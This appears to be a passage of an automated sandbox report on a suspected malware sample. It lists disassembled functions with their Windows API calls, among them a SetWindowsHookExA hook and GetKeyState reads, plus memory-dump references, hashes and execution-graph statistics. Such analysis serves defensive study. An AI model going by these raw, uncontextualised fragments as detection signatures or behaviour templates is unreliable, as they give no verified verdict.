                                                                                                    • Instruction Fuzzy Hash: B8118439720214AFC710EE2CCC85DEF77F89F492A1F54486AF909DB250D670DD8187A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CD6E2 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6FE
                                                                                                    • EnterCriticalSection.KERNEL32(033302EC), ref: 032CD743
                                                                                                    • InterlockedExchange.KERNEL32(0331AAF0,?), ref: 032CD75F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2380408948-0
                                                                                                    • Opcode ID: 18b8beb9f202dfdfb5b0ea3c3c1d66dc393e892b43f6cf232f09f378b69b60e6
                                                                                                    • Instruction ID: e9f8b363a2075080c48894bac15f27020f9d440df6de176bea7f5a73e80a4076
                                                                                                    • Opcode Fuzzy Hash: 18b8beb9f202dfdfb5b0ea3c3c1d66dc393e892b43f6cf232f09f378b69b60e6
                                                                                                    • Instruction Fuzzy Hash: DA21D134A74785EFDB10EBA8DC80BADB7F8EB05700F548678E400DA651D3B598C5CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03302D2C Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumWindows.USER32(Function_00052CBC), ref: 03302D61
                                                                                                    • GetWindow.USER32(00000003,00000003), ref: 03302D79
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 03302D86
                                                                                                    • SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 03302DC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnumLongWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 4191631535-0
                                                                                                    • Opcode ID: 4eaef4601a1a7476d1c3c23a12568ddfa295e88cf29c78d221f366f3fe3f352c
                                                                                                    • Instruction ID: eb0b310e061443f24a59ecd18200ec933c9d237eb7ffcb560e8f602a9ed5c6f7
                                                                                                    • Opcode Fuzzy Hash: 4eaef4601a1a7476d1c3c23a12568ddfa295e88cf29c78d221f366f3fe3f352c
                                                                                                    • Instruction Fuzzy Hash: 321121356147109FD710EA2CCCD9F9677E8AB45760F190565F968DF2D2C3B09C80C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EA03C Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0e489b3884acf2b4faaf48379fb414c14731e3bcd665f9d5c20ec7a8234df375
                                                                                                    • Instruction ID: e8994e1a24675d1da16c20db9756f44562cd307329d59320d6e973f69570dae3
                                                                                                    • Opcode Fuzzy Hash: 0e489b3884acf2b4faaf48379fb414c14731e3bcd665f9d5c20ec7a8234df375
                                                                                                    • Instruction Fuzzy Hash: 08014B283143482BC774FD6A9D85F6B7A6DDFC1B51F48443878299F702EAA5DC80C3A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E7F40 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 032E7F4D
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,032E7FB8,-000000F7,?,00000000,032E7B72,?,-00000010,?), ref: 032E7F56
                                                                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 032E7F6B
                                                                                                    • GetPropA.USER32(00000000,00000000), ref: 032E7F82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2582817389-0
                                                                                                    • Opcode ID: 972ccb658ab247196085dead253b36b4e3ee5e8e0989c54c007d78302ca64f47
                                                                                                    • Instruction ID: 784031b48577c105544d2cc885ae3379a8c8cce1fdfaad416a0dab7fa4d943ab
                                                                                                    • Opcode Fuzzy Hash: 972ccb658ab247196085dead253b36b4e3ee5e8e0989c54c007d78302ca64f47
                                                                                                    • Instruction Fuzzy Hash: B0F0E5192727235BEA20FBFD5D828BF62ACDE40790B888461FC01CA018E755CCC1C1B2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E6FE0 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(?), ref: 032E6FED
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,?,032E3C51,?,032E2D0D), ref: 032E6FF6
                                                                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 032E700B
                                                                                                    • GetPropA.USER32(?,00000000), ref: 032E7022
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2582817389-0
                                                                                                    • Opcode ID: f0e344bbc04f92307ca198969832d623703823cd89f51f93640c6fdc7de57377
                                                                                                    • Instruction ID: e77b2b82fbab34af822627d8fd9f743af5e234b55baff62bc477d5bfd2d2bb14
                                                                                                    • Opcode Fuzzy Hash: f0e344bbc04f92307ca198969832d623703823cd89f51f93640c6fdc7de57377
                                                                                                    • Instruction Fuzzy Hash: 18F0375933631266CA24F6B99CC187B669C89447E178444A1FE42DF116D556CCC282B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03302514 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0330252C
                                                                                                    • SetWindowsHookExA.USER32(00000003,033024D0,00000000,00000000), ref: 0330253C
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03302557
                                                                                                    • CreateThread.KERNEL32(00000000,000003E8,03302474,00000000,00000000), ref: 0330257B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread$CurrentEventHookWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1195359707-0
                                                                                                    • Opcode ID: da271c4956ff4aa469d690e14308d51d1eb9f265154d145e68cc2d86be64d74e
                                                                                                    • Instruction ID: c09f7bc2cab124a34963bf748188e5ae60cddbe45ca6fff5f449e05486c453d6
                                                                                                    • Opcode Fuzzy Hash: da271c4956ff4aa469d690e14308d51d1eb9f265154d145e68cc2d86be64d74e
                                                                                                    • Instruction Fuzzy Hash: 86F03A70780304AEFA64E7A09CEAB6636ACD704B15F109455F14AAE4C4C3F010C08F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D7630 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D7639
                                                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 032D764B
                                                                                                    • GetTextMetricsA.GDI32(00000000), ref: 032D7656
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D7667
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2013942131-0
                                                                                                    • Opcode ID: 2bd7be2bd96ac37c156d23e079149301b8263c1a2b290f22f1d1d911c2d3f440
                                                                                                    • Instruction ID: e317152696c22e64e7062b846903acdbe4fe4f9f90c961197fe069376195d142
                                                                                                    • Opcode Fuzzy Hash: 2bd7be2bd96ac37c156d23e079149301b8263c1a2b290f22f1d1d911c2d3f440
                                                                                                    • Instruction Fuzzy Hash: E3E0865166277226D611F6AD5C81FEF795C8F12AE1F8C0291FD44AE3C0EA49DA8082F6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D2210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032D14F0: EnterCriticalSection.KERNEL32(?,032D152D), ref: 032D14F4
                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,032D2404,?,00000000,032D242C), ref: 032D233F
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 032D23E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                                                    • String ID: Default
                                                                                                    • API String ID: 249151401-753088835
                                                                                                    • Opcode ID: 17678613aac2bfc63c9e2751619864233e5925c22495dbae9edb9808251c4e9f
                                                                                                    • Instruction ID: 27764a9e5518b55f66627d53a2127534d2b21618751b23237b4a9899bd41e11c
                                                                                                    • Opcode Fuzzy Hash: 17678613aac2bfc63c9e2751619864233e5925c22495dbae9edb9808251c4e9f
                                                                                                    • Instruction Fuzzy Hash: F8616A34A24348DFDB15DFA8C984BDDBBF9EF49300F5844A5E840AB652C3B09A85CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B1D08 Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cff4e48df611f8432e32e7190b9f924729c3185e44d56f2925c993a7594f00dc
                                                                                                    • Instruction ID: 30f682d791f67c40b7452328f2d36442e377847fdcc02b70d6506b74f17665f5
                                                                                                    • Opcode Fuzzy Hash: cff4e48df611f8432e32e7190b9f924729c3185e44d56f2925c993a7594f00dc
                                                                                                    • Instruction Fuzzy Hash: 36A1D6667307010BD718EA7C9CA43EDB3A59B847D1F2C427EE114CB395E7A8E9E58390
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BA5EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,032BA6DA), ref: 032BA672
                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,032BA6DA), ref: 032BA678
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                    • String ID: yyyy
                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                    • Opcode ID: 736b539eebac56df5bfd908a2967199531dbcbbf7d2dc7260ecfb8d6e1aa5cf8
                                                                                                    • Instruction ID: 66608e5042a491425b4156477419fb2afe10d48a8995b0229b41a5f3f23f2c22
                                                                                                    • Opcode Fuzzy Hash: 736b539eebac56df5bfd908a2967199531dbcbbf7d2dc7260ecfb8d6e1aa5cf8
                                                                                                    • Instruction Fuzzy Hash: 7D2195B5A202189FCF14EF95C881AEEB3F8EF08780F4504A5E945EB251E7749EC0D7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EA91C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$EqualIntersect
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3291753422-2766056989
                                                                                                    • Opcode ID: 9c7bf5dcfd9de15934f31ca30ef02c4e26b6de3393bbfac088c86ff44963cd1a
                                                                                                    • Instruction ID: e5422db597750669ae7307c8af074160e8088bcd91d4679d5ed8fc88a7fa3a0b
                                                                                                    • Opcode Fuzzy Hash: 9c7bf5dcfd9de15934f31ca30ef02c4e26b6de3393bbfac088c86ff44963cd1a
                                                                                                    • Instruction Fuzzy Hash: 2611E3356242486BCB01DA6CC884BEEBBECAF4A214F480291EC04DF341C771DD8587D0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DAF50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DAF9E
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DAFB0
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: MonitorFromPoint
                                                                                                    • API String ID: 1792783759-1072306578
                                                                                                    • Opcode ID: 0a9d5f7d100a49dce31375c2e70441f82b65cfb56a446c7fe231251942c2363d
                                                                                                    • Instruction ID: 499b3e18f2c0642c86e9380347a03a7758501eee7ca175c891109d9f661a7835
                                                                                                    • Opcode Fuzzy Hash: 0a9d5f7d100a49dce31375c2e70441f82b65cfb56a446c7fe231251942c2363d
                                                                                                    • Instruction Fuzzy Hash: 4501AEB6618209AFEB04DF55D8C4F99B769EF44355F048055F916CF244C3729CC2CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DAE28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DAE79
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DAE85
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: MonitorFromRect
                                                                                                    • API String ID: 1792783759-4033241945
                                                                                                    • Opcode ID: 39aa367652fa2c4e50c57a2f393cbc6130d2afed67f06fc3ea23787a81488c87
                                                                                                    • Instruction ID: 8f86f61db5f0e8e136e2971a7fb47fac92f5330a1f4c292e3f0f069b2f087ad7
                                                                                                    • Opcode Fuzzy Hash: 39aa367652fa2c4e50c57a2f393cbc6130d2afed67f06fc3ea23787a81488c87
                                                                                                    • Instruction Fuzzy Hash: 76014F71E142149FE724DB15D484F5ABB5AEB45351F088065E909CE205C37098C4CBF0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DADA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(?), ref: 032DAE02
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    • GetSystemMetrics.USER32(?), ref: 032DADC8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: GetSystemMetrics
                                                                                                    • API String ID: 1792783759-96882338
                                                                                                    • Opcode ID: 62358e1153076cf83402ad8e84ed5fed0d1585e6eba20755a8b2925f2fc58786
                                                                                                    • Instruction ID: a6e7703fb2b1f50c02e2c159025f138d9dea5ef04561db3f83a7a1c2f391dccd
                                                                                                    • Opcode Fuzzy Hash: 62358e1153076cf83402ad8e84ed5fed0d1585e6eba20755a8b2925f2fc58786
                                                                                                    • Instruction Fuzzy Hash: 4AF05970A383800FD724EA3CD8C4E73391EDB85332F148B60E1274A1DCC2B488C0C658
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E3200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyState.USER32(00000010), ref: 032E321B
                                                                                                    • GetKeyState.USER32(00000011), ref: 032E322C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State
                                                                                                    • String ID:
                                                                                                    • API String ID: 1649606143-3916222277
                                                                                                    • Opcode ID: 669905e1ecc03226cb31e3ba03f71be1a871f94f283114bc7ed63f0bda2a2c5f
                                                                                                    • Instruction ID: 5cbd7fe39f79f80ff4cb6d7faa78e4eecaeb7d0fae4e6c441708a0e5a9f46204
                                                                                                    • Opcode Fuzzy Hash: 669905e1ecc03226cb31e3ba03f71be1a871f94f283114bc7ed63f0bda2a2c5f
                                                                                                    • Instruction Fuzzy Hash: 08E0922E71078612FA12F56C2C017E757954F827B6F4C0AA6FFE42B0C1E6C70D9191A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03308C40 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 03308C74
                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 03308CA4
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 03308CC3
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 03308CCF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$Write
                                                                                                    • String ID:
                                                                                                    • API String ID: 3448952669-0
                                                                                                    • Opcode ID: 4edb68b7e19e9935cf9c109d26bd83859e5e216203624d26d438e705ded6ee2b
                                                                                                    • Instruction ID: e64aa52b6ea9552edf4712495ed505da94e8d64d46086dd740df5ef387f8e397
                                                                                                    • Opcode Fuzzy Hash: 4edb68b7e19e9935cf9c109d26bd83859e5e216203624d26d438e705ded6ee2b
                                                                                                    • Instruction Fuzzy Hash: 5521AFB5A417199BDF10CF18CDC0BAEB3B8EF40360F044151ED14AB384DB74E8518AA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.4%
                                                                                                    Dynamic/Decrypted Code Coverage:4.2%
                                                                                                    Signature Coverage:1.4%
                                                                                                    Total number of Nodes:357
                                                                                                    Total number of Limit Nodes:51
